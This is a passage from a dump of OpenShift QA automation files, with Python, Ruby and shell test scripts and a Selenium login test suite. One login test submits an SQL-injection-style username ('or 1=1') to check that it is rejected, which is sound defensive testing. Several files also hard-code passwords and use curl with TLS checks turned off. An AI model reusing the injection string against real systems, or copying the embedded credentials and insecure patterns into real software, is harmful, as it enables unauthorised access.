readline-devel zlib zlib-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison iconv-devel\"\n RUBY_VERSIONS = [\"1.8.7\", \"1.9.3\"]\n\n def setup_env_var\n ENV['RHTEST_HOME'] = Setup::RHTEST_HOME\n end\n\n def detect_os\n file = File.new('/etc/issue', 'r')\n content = file.read\n file.close\n Setup::OS_HASH.each do |key, value|\n match = value.match(content)\n if Regexp.last_match\n return key\n end\n end\n return nil\n end\n\n def install_packages(os_type)\n puts \"Install packages using yum/apt-get\"\n if os_type == :fedora16\n packages = Setup::YUM_PACKAGES\n packages += \" rhc\"\n elsif os_type == :fedora17\n packages = Setup::YUM_PACKAGES\n end\n if os_type == :fedora16 or os_type == :fedora17\n output = `yum install -y #{packages}`\n end\n if $?.exitstatus != 0\n puts \"Failed to install yum packages\"\n return false\n else\n return true\n end\n end\n\n def setup_rvm\n end\n\n def setup_python_virtualenv\n end\nend\n\n\ninclude Setup\n# Setup environment variables\nSetup::setup_env_var\n# Detect OS type\nos_type = Setup::detect_os\nif os_type\n puts \"Your OS type is: #{os_type}\"\nelse\n puts \"Failed to detect your OS type\"\nend\n" }, { "alpha_fraction": 0.6428972482681274, "alphanum_fraction": 0.6440201997756958, "avg_line_length": 33.230770111083984, "blob_id": "d49b2d5eb778496233e7e0d3868398edcfc74ccd", "content_id": "f32afc9c545df1243e5fb6a43665b276ffb6e60e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 90, "num_lines": 52, "path": "/automation/open/bin/convert_script.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport tcms_base\nimport logging, logging.handlers\nimport sys\nfrom optparse import OptionParser\n\ndef config_logger():\n # create formatter\n formatter = logging.Formatter(\"%(levelname)s [%(asctime)s] %(message)s\",\n \"%H:%M:%S\")\n logger = logging.getLogger(\"dump_logs\")\n log_formatter = logging.Formatter(\n \"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\n \n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(logging.DEBUG)\n file_handler = logging.FileHandler('out.log')\n\n logger.setLevel(logging.INFO)\n logger.addHandler(stream_handler)\n logger.addHandler(file_handler)\n return logger\n\nlog = config_logger()\nparser = OptionParser()\n\ndef config_parser():\n # these are required options.\n parser.add_option(\"-t\", \"--testplan\", default='Test Plan for OpenShift 2.0', \n help=\"target testplan to update\")\n parser.add_option(\"-a\", \"--action\", default='convert',\n help=\"action you want to take (convert|revert)\")\n parser.add_option(\"-c\", \"--case_id\", default=None, help=\"testcase id to be converted\")\n (options, args) = parser.parse_args()\n \n return options, args\n\nif __name__ == '__main__':\n (options, args)= config_parser()\n \n if options:\n testplan_name = options.testplan\n tcms_obj = tcms_base.TCMS(test_plan=testplan_name)\n if options.action == 'convert':\n tcms_base.update_script_field_to_json_format(tcms_obj, options.case_id)\n \n elif options.action == 'revert':\n tcms_base.revert_script_field_to_python_format(tcms_obj, options.case_id)\n else:\n log.info(\"No action defined, must be convert or revert\") \n" }, { "alpha_fraction": 0.6407147645950317, "alphanum_fraction": 0.647734522819519, "avg_line_length": 30.979591369628906, "blob_id": 
"5df5162df09d7805e6fa77ba79b72842d207d867", "content_id": "1f02886c970cf2523d0d3e81f88aa4bdf0fe5e17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1567, "license_type": "no_license", "max_line_length": 111, "num_lines": 49, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_prebuilt_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\n\"\"\"\nimport os\nimport shutil\nimport rhtest\nimport common\nfrom jbossas_exploded_wars_without_jenkins import JBossHotDeployExplodedWarsWithoutJenkins\n\nclass JBossHotDeployPrebuiltWarsWithoutJenkins(JBossHotDeployExplodedWarsWithoutJenkins):\n\n def __init__(self, config):\n JBossHotDeployExplodedWarsWithoutJenkins.__init__(self, config)\n self.config.summary = \"[US2443] Hot deployment support for Jboss-as7 application with 2 pre-built wars\"\n\n def war(self, operation, war_file):\n source_file = \"%s/%s\" % ( self.config.app_template_dir, war_file )\n destination_dir = \"./%s/%s\" % ( self.config.application_name, self.config.deploy_dir )\n destination_file = \"%s/%s\" % ( destination_dir, war_file )\n marker_file_name = \"%s/%s.dodeploy\" % ( destination_dir, war_file )\n if operation == \"add\":\n # Copying the file\n shutil.copyfile(source_file, destination_file)\n # Creating the marker\n marker = file(marker_file_name, \"a\")\n marker.close()\n elif operation == \"remove\":\n # Removing the file\n os.remove(destination_file) \n # Removing marker\n os.remove(marker_file_name)\n # ... and deploying\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployPrebuiltWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7304452657699585, "alphanum_fraction": 0.7412755489349365, "avg_line_length": 27.65517234802246, "blob_id": "0348a6f79387d2ff5f2b63cee7b44b839c68a37a", "content_id": "4196e6f8d400ac75b3326e797aac5d9f112b9a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 831, "license_type": "no_license", "max_line_length": 107, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_exploded_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossas_exploded_wars_without_jenkins import JBossHotDeployExplodedWarsWithoutJenkins\n\nclass EWSHotDeployExplodedWarsWithoutJenkins(JBossHotDeployExplodedWarsWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployExplodedWarsWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbossews']\n self.config.deploy_dir = \"webapps\"\n self.config.summary = \"[US2513] Hot deployment support for JbossEWS application with exploded wars\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSHotDeployExplodedWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5269798636436462, "alphanum_fraction": 0.5315436124801636, "avg_line_length": 38.21052551269531, "blob_id": "69261c49044e62dc40a7e98555c0f6ca69fee406", "content_id": "afd24305a78014ef450f4c2f2ce49af91e6a1df6", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3725, "license_type": "no_license", "max_line_length": 253, "num_lines": 95, "path": "/automation/open/testmodules/RT/scaling/prohibited_cartridges.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n[US2089][BI] Prohibit cartridges except mysql and jenkins-client from being embedded to a scalable app\nhttps://tcms.engineering.redhat.com/case/145115/\n\"\"\"\nimport rhtest\nimport common\nimport testcase\nimport openshift\n\n\nclass ScalingProhibitedCartridges(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2089][BI] Prohibit cartridges except mysql and jenkins-client from being embedded to a scalable app\"\n common.env_setup()\n \n def finalize(self):\n pass\n\n def test_method(self):\n \n self.info(\"===============================================\")\n self.info(\"Creating a scalable application (PHP)\")\n self.info(\"===============================================\")\n common.create_app(\n \"testapp\", \n common.app_types['php'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n clone_repo = False,\n scalable = True\n )\n\n # Dependency\n self.info(\"===============================================\")\n self.info(\"Creating a Jenkins app (It's a dependency)\")\n self.info(\"===============================================\")\n common.create_app(\n \"jenkins\", \n common.app_types['jenkins'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n clone_repo = False \n )\n\n for cartridge in common.cartridge_types.keys():\n if cartridge == \"mysql\" or cartridge == \"jenkins\" or cartridge == \"mongodb\":\n expect_return_rest = \"Added\"\n expect_return_cli = 0\n cartridge_enabled = True\n else:\n expect_return_rest = \"Failed to add\"\n expect_return_cli = 1\n cartridge_enabled = False\n \n self.info(\"===============================================\")\n self.info(\"Embedding cartridge via REST API - \" + cartridge)\n self.info(\"===============================================\")\n ( status, messages ) = self.config.rest_api.cartridge_add(\"testapp\", common.cartridge_types[cartridge])\n self.assert_true(messages[0][\"text\"].startswith(expect_return_rest))\n \n # Dependency\n if cartridge_enabled:\n common.command_get_status(\"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % (common.cartridge_types[cartridge], \"testapp\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n \n self.info(\"===============================================\")\n self.info(\"Embedding cartridge in the command line - \" + cartridge)\n self.info(\"===============================================\")\n ret_code = common.embed(\"testapp\", \"add-\" + common.cartridge_types[cartridge])\n self.assert_equal(ret_code, expect_return_cli)\n \n # Cleaning\n if cartridge_enabled:\n common.command_get_status(\"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % (common.cartridge_types[cartridge], \"testapp\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n\n # Everything is OK: Passed\n return self.passed(self.summary)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ScalingProhibitedCartridges)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = 
get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6132723093032837, "alphanum_fraction": 0.6218535304069519, "avg_line_length": 31.98113250732422, "blob_id": "cc2df07eda87f04b6067ad6cc0f9185b17cb2e21", "content_id": "0ab0b59da5e80897c14f13176dded82e5a30957e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1748, "license_type": "no_license", "max_line_length": 93, "num_lines": 53, "path": "/automation/open/testmodules/RT/limits/app_template/max_gears/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nfrom pymongo import Connection\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n \n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/set-max-gears':\n try:\n c = Connection('localhost', 27017)\n broker = c.openshift_broker_dev\n broker.authenticate('libra', 'momo')\n userdb = broker['user']\n user_details = { '_id' : '#mongodb_user_email#' }\n user = userdb.find_one( user_details )\n user['max_gears'] = #mongodb_max_gears#\n userdb.update( user_details, user )\n except Exception as e:\n response_body = \"DB OPERATION FAILS: %s - %s\" % ( type(e), e.args )\n else:\n response_body = \"DB OPERATION SUCCESS\"\n else:\n response_body = 'test'\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n\t\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6810207366943359, "avg_line_length": 19.225807189941406, "blob_id": "9274c30925823673245525a4f86e4a6d28169789", "content_id": "c26f48c483790f6feca6069bc75a8f994a650f63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 627, "license_type": "no_license", "max_line_length": 91, "num_lines": 31, "path": "/automation/open/project.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Project RHTEST page\n===================\n\n.. 
literalinclude:: README\n\n\nLauncher:\n---------\n\n ./bin/launcher --help\n\nTo run particular testecases selected by tags against EC2 instance tagged by 'QE_user-dev':\n ./bin/launcher -t \"Test by sprint22 tag\" -g sprint22 -A QE_user-dev\n\n\nFollowing example will run the same tests against current devenv AMI-ID:\n\n ./bin/launcher -t \"Test by sprint22 tag\" -g sprint22 \n\n\nEnvironment variables:\n----------------------\n\n* RHTEST_DEBUG\n* RHTEST_HOME\n* RHTEST_ARGS\n* RHTEST_REST_TIMEOUT\n* RHTEST_RHC_CLIENT_OPTIONS\n* OPENSHIFT_libra_server\n* OPENSHIFT_user_email\n* OPENSHIFT_user_passwd\n" }, { "alpha_fraction": 0.52925044298172, "alphanum_fraction": 0.5351919531822205, "avg_line_length": 34.57723617553711, "blob_id": "820e04303bb44d5d4c6079f2f5a86f71bdc1a0e7", "content_id": "3fbe5521d8de779ff2b8fe3469a0031578ccdfb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4376, "license_type": "no_license", "max_line_length": 144, "num_lines": 123, "path": "/open_automation/bin/jenkins_job.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# File name: jenkins_job.sh\n# Date: 2012/10/04 09:31\n# Author: [email protected]\n\n####################################\n### checking mandatory variables ###\n####################################\ntest -z \"$JENKINS_JOB_TOKEN\" && { echo \"ERROR: Missing JENKINS_JOB_TOKEN variable\"; exit 1; } \ntest -z \"$TCMS_USER\" && { echo \"ERROR: Missing TCMS_USER variable\"; exit 1; } \ntest -z \"$TCMS_PASSWORD\" && { echo \"ERROR: Missing TCMS_PASSWORD variable\"; exit 1; } \n\n\n#### SET THE ENVIRONMENT VARIABLES AS NEEDED\nexport RHTEST_HOME=$(pwd)\nexport PATH=${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PATH\nexport PYTHONPATH=${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PYTHONPATH\n\n\n#### THIS WILL AUTHENTICATE TO NITRATE\n\necho -e \"\\nDEBUG: Kerberos init...\"\nkinit.sh || exit 1\n\n\ntest -n \"$AMI_ID\" && OPTIONS=\"${OPTIONS} -m $AMI_ID -z t1.micro \"\ntest -n \"$TESTRUN_ID\" && OPTIONS=\"${OPTIONS} -i $TESTRUN_ID \"\ntest -n \"$INSTANCE_IP\" && OPTIONS=\"${OPTIONS} -a $INSTANCE_IP \"\ntest -n \"$TESTRUN_TAG\" && OPTIONS=\"${OPTIONS} -t $TESTRUN_TAG \"\ntest -n \"$TCMS_TAGS\" && OPTIONS=\"${OPTIONS} -g $TCMS_TAGS \"\n\n\nif [ \"$SLAVE\" == \"false\" ]; then\n echo \"##########################################################\"\n echo \"MASTER...\"\n echo \"##########################################################\"\n\n test -z \"$POOL_ACCOUNT\" && { echo \"ERROR: Missing POOL_ACCOUNT variable\"; exit 1; } \n\n #WHERE TO RUN...\n if [ -n \"$INSTANCE_IP\" ]; then\n WHERE=\"{ \\\"name\\\": \\\"INSTANCE_IP\\\", \\\"value\\\": \\\"$INSTANCE_IP\\\" }, \"\n else\n WHERE=\"{ \\\"name\\\": \\\"AMI_ID\\\", \\\"value\\\": \\\"$AMI_ID\\\" }, \"\n fi\n\n if [ -z \"$TESTRUN_ID\" ]; then\n if [ -z \"$TCMS_TAGS\" ]; then\n echo \"ERROR: Missing TCMS_TAGS argument, when no TESTRUN_ID was defined\"\n exit 1\n fi\n echo -e \"\\nDEBUG: Creating new testrun...\"\n TESTRUN_ID=$(create_test_run.py -t $TESTRUN_TAG -g $TCMS_TAGS | awk -F ':' '/test_run/{print $2}')\n if [ -z \"$TESTRUN_ID\" ]; then\n echo \"ERROR: Unable to create testrun\"\n exit 1\n fi\n echo \"DEBUG: testrun_id=$TESTRUN_ID\"\n else\n if [ \"$RESET_TESTRUN\" == \"true\" ]; then\n echo -e \"\\nDEBUG: Resetting testrun...\"\n python $RHTEST_HOME/bin/reset_testrun.py $TESTRUN_ID\n if [ -n \"$TCMS_TAGS\" ]; 
then\n echo \"DEBUG: Refresing testrun with $TCMS_TAGS\"\n python $RHTEST_HOME/bin/refresh_testrun_by_tag.py $TESTRUN_ID $TCMS_TAGS\n fi\n fi\n fi\n\n#\n# Each slave can run ONLY with TESTRUN_ID !\n#\n for acc in $POOL_ACCOUNT; do\n OPENSHIFT_user_email=$(echo $acc | awk -F \":\" '{print $1}')\n OPENSHIFT_user_passwd=$(echo $acc | awk -F \":\" '{print $2}')\n \n \n json=\"{ \\\"parameter\\\": [ \n$WHERE\n{ \\\"name\\\": \\\"TESTRUN_ID\\\", \\\"value\\\": \\\"$TESTRUN_ID\\\" },\n{ \\\"name\\\": \\\"OPENSHIFT_user_passwd\\\", \\\"value\\\":\\\"$OPENSHIFT_user_passwd\\\"}, \n{ \\\"name\\\": \\\"OPENSHIFT_user_email\\\", \\\"value\\\":\\\"$OPENSHIFT_user_email\\\"}, \n{ \\\"name\\\": \\\"SLAVE\\\", \\\"value\\\":\\\"true\\\" },\n{ \\\"name\\\": \\\"TCMS_USER\\\", \\\"value\\\" : \\\"$TCMS_USER\\\"},\n{ \\\"name\\\": \\\"TCMS_PASSWORD\\\", \\\"value\\\":\\\"$TCMS_PASSWORD\\\" } ]}\"\n\n JENKINS_URL=\"http://ciqe.englab.nay.redhat.com\"\n DELAY=$((DELAY+20))\n URL=\"$JENKINS_URL/job/$JOB_NAME/build?token=$JENKINS_JOB_TOKEN&delay=$DELAY\"\n \n curl -s -L -k -X POST -H \"Accept:application/json\" -u mzimen:redhat -d token=devenv $URL --data-urlencode json=\"$json\" | elinks -dump |head\n echo -e \"\\n****************************************************************\\n\"\n\n done\nelse\n###############################################################################\n###############################################################################\n###############################################################################\n echo -e \"\\nSLAVE\\n\"\n #this might have influen\n echo \"DEBUG: Updating the client...\"\n if [ -n \"$CLIENT_VERSION\" ]; then\n python $RHTEST_HOME/bin/update_rhc_client.py --release $CLIENT_VERSION\n else\n python $RHTEST_HOME/bin/update_rhc_client.py \n fi\n\n echo -e \"\\nDEBUG: Launching the testrun...\\n\"\n\n python $RHTEST_HOME/bin/launcher.py $OPTIONS\n if [ -n \"$SHUTDOWN\" ]; then\n if [ -n \"$INSTANCE_NAME\" ]; then\n echo \"ERROR: Missing INSTANCE_NAME for shutdown the instance\"\n else\n python $RHTEST_HOME/bin/shutdow_instance.py -i $INSTANCE_NAME\n fi\n fi\nfi\n\nexit 0\n\n#### END\n" }, { "alpha_fraction": 0.6593483686447144, "alphanum_fraction": 0.6632638573646545, "avg_line_length": 43.693748474121094, "blob_id": "403f32a766f570312df0849b166fc2e9b7b03fd4", "content_id": "57d10e25835ce2ebf410d7ca33d029ef791f5d70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7151, "license_type": "no_license", "max_line_length": 112, "num_lines": 160, "path": "/automation/open/testmodules/UI/web/tc_login.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass LoginPage(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n def test_check_login_form(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.assert_element_present_by_css(self,\"a.password_reset.more\")\n # baseutils.is_element_hidden(self,By.ID,\"login-form\")\n baseutils.click_element_by_css_no_wait(self,\"a.sign_up.more\")\n time.sleep(5)\n baseutils.is_element_displayed(self,By.ID,\"signup\")\n baseutils.click_element_by_css_no_wait(self,\"#signup > a.close_button > 
img\")\n time.sleep(5)\n baseutils.is_element_hidden(self,By.ID,\"signup\")\n #baseutils.check_title(self,\"OpenShift by Red Hat | Sign up for OpenShift\")\n# baseutils.assert_text_equal_by_css(self,\"Need to Register instead?\",\"#register > h2\")\n\n def test_login_invalid_user(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,\"xtian\",config.password)\n baseutils.assert_text_equal_by_css(self,\"Invalid username or password\",\"div.message.error\")\n\n\n def test_login_without_user(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,\"\",config.password)\n baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"label.error\")\n\n def test_login_without_pwd(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],\"\")\n baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"label.error\")\n\n\n def test_login_granted_user(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n baseutils.assert_element_present_by_link_text(self,\"Sign out\") \n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n\n\n def test_login_sql_bypass(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,\"[email protected] or 1=1\",config.password)\n baseutils.assert_text_equal_by_css(self,\"Invalid username or password\",\"div.message.error\")\n\n\n\n def test_login_session_existing(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n # baseutils.wait_for_ajax(self)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # baseutils.assert_element_present_by_link_text(self,\"Get started!\")\n baseutils.assert_element_present_by_link_text(self,\"Sign out\") \n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n baseutils.go_to_express(self)\n baseutils.assert_element_present_by_link_text(self,\"Sign out\")\n '''\n def test_login_from_express_regisra_link(self):\n self.driver.get(config.confirm_url_express_yujzhang)\n# print config.confirm_url_express_yujzhang\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n# baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.email(config.confirm_url_express_yujzhang),\"login_input\")\n baseutils.input_by_id(self,\"pwd_input\",config.granted_user2[1])\n print config.granted_user2[1]\n baseutils.scroll_by(self)\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S EXPRESS?\",\"#about > header > h1\")\n \n \n def test_login_from_flex_regisra_link(self):\n self.driver.get(config.confirm_url_flex)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n# baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.email(config.confirm_url_flex),\"login_input\")\n 
baseutils.input_by_id(self,\"pwd_input\",config.password)\n baseutils.scroll_by(self)\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S FLEX?\",\"#about > header > h1\")\n '''\n def test_login_logout_back(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # baseutils.assert_element_present_by_link_text(self,\"Get started!\")\n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n baseutils.assert_element_present_by_link_text(self,\"Sign out\")\n baseutils.logout(self)\n baseutils.go_back(self)\n self.driver.refresh()\n baseutils.assert_element_present_by_link_text(self,\"Sign in\")\n\n def test_login_cookie_deleted(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n # baseutils.wait_for_ajax(self)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # baseutils.assert_element_present_by_link_text(self,\"Get started!\")\n _greetings=baseutils.generate_greetings(config.granted_user[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n baseutils.assert_element_present_by_link_text(self,\"Sign out\")\n self.driver.delete_cookie(\"_rhc_session\")\n self.driver.delete_cookie(\"rh_sso\")\n self.driver.refresh()\n baseutils.assert_element_present_by_link_text(self,\"Sign in\")\n \n\n \n def tearDown(self):\n self.driver.quit()\n if len(self.verificationErrors)==1:\n self.assertEqual([''], self.verificationErrors)\n else:self.assertEqual([], self.verificationErrors)\n \n '''\n if self.verificationErrors != [] or self.verificationErrors != [''] :\n for error in self.verificationErrors:\n if error.strip()!=[''] or error.strip()!=[]:\n self.fail(error.strip())\n '''\n \n# self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.5841924548149109, "alphanum_fraction": 0.5917525887489319, "avg_line_length": 28.09000015258789, "blob_id": "2504757de7860347a001bef9ad39c73781e99f7a", "content_id": "c2c00a8b48b9d6c5e590e0e8644b688c8b45235a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2910, "license_type": "no_license", "max_line_length": 113, "num_lines": 100, "path": "/automation/open/testmodules/RT/cartridge/jbossas_java7.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nJul 26, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\n\nclass JBossJava7Test(rhtest.Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types[\"jbossas\"]\n self.config.git_repo = \"./%s\" % self.config.application_name\n self.config.scalable = False\n self.config.java_version = \"1.7\"\n\tself.config.summary = \"[US2218] Java 7 with non-scaling JBoss application\"\n \n def log_info(self, message):\n self.info(\"========================\")\n self.info(message)\n self.info(\"========================\")\n\n def 
initialize(self):\n        self.log_info(\"Initializing\")\n        common.env_setup()\n        common.create_app(\n            self.config.application_name,\n            self.config.application_type,\n            self.config.OPENSHIFT_user_email,\n            self.config.OPENSHIFT_user_passwd,\n            clone_repo = True,\n            git_repo = self.config.git_repo,\n            scalable = self.config.scalable\n        )\n\n    def finalize(self):\n        self.log_info(\"Finalizing\")\n        rmtree(self.config.git_repo)\n\n    def check_marker(self):\n        self.assert_true(os.path.exists(self.config.git_repo + \"/.openshift/markers/java7\"), \"Marker must exist\")\n\n    def deploy_version_checking_app(self):\n        # Editing file\n        jsp_file = open(self.config.git_repo + \"/src/main/webapp/version.jsp\", \"w\")\n        jsp_file.write('<%@ page contentType=\"text/plain\" %>')\n        jsp_file.write('<%@ page trimDirectiveWhitespaces=\"true\" %>')\n        jsp_file.write('<% out.println(\"Java version: \" + System.getProperty(\"java.version\")); %>')\n        jsp_file.close()\n        # Deploying\n        deployment_steps = [\n            \"cd %s\" % self.config.git_repo,\n            \"git add .\",\n            \"git commit -a -m testing\",\n            \"git push\"\n        ]\n        common.command_get_status(\" && \".join(deployment_steps))\n\n    def test_method(self):\n        self.check_marker()\n\n        self.deploy_version_checking_app()\n\n        sleep(30) # Waiting for the application\n\n        number_of_operations = 1\n        if self.config.scalable:\n            number_of_operations = 3\n\n        for i in range(0, number_of_operations):\n            ret_code = common.check_web_page_output(\n                self.config.application_name, \n                \"version.jsp\",\n                \"Java version: \" + self.config.java_version\n            )\n            self.assert_equal(ret_code, 0)\n\n        # Everything is OK\n        return self.passed(self.config.summary) \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(JBossJava7Test)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n" }, { "alpha_fraction": 0.5734363198280334, "alphanum_fraction": 0.5806533098220825, "avg_line_length": 44.64739990234375, "blob_id": "f4b9446282d7604dd5e410ce8bcc1568d571278a", "content_id": "cc14768da72bc0a86646c81190bcc4bd373fbe21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7898, "license_type": "no_license", "max_line_length": 306, "num_lines": 173, "path": "/automation/open/testmodules/RT/cartridge/mysql_after_alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]test mysql works well after altering namespace\nhttps://tcms.engineering.redhat.com/case/122288/\n\"\"\"\n\n\nimport os\nimport sys\nimport re\nimport string\nimport random\nimport testcase\nimport common\nimport OSConf\nimport rhtest\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        self.summary = \"[rhc-cartridge]test mysql works well after altering namespace\"\n        try:\n            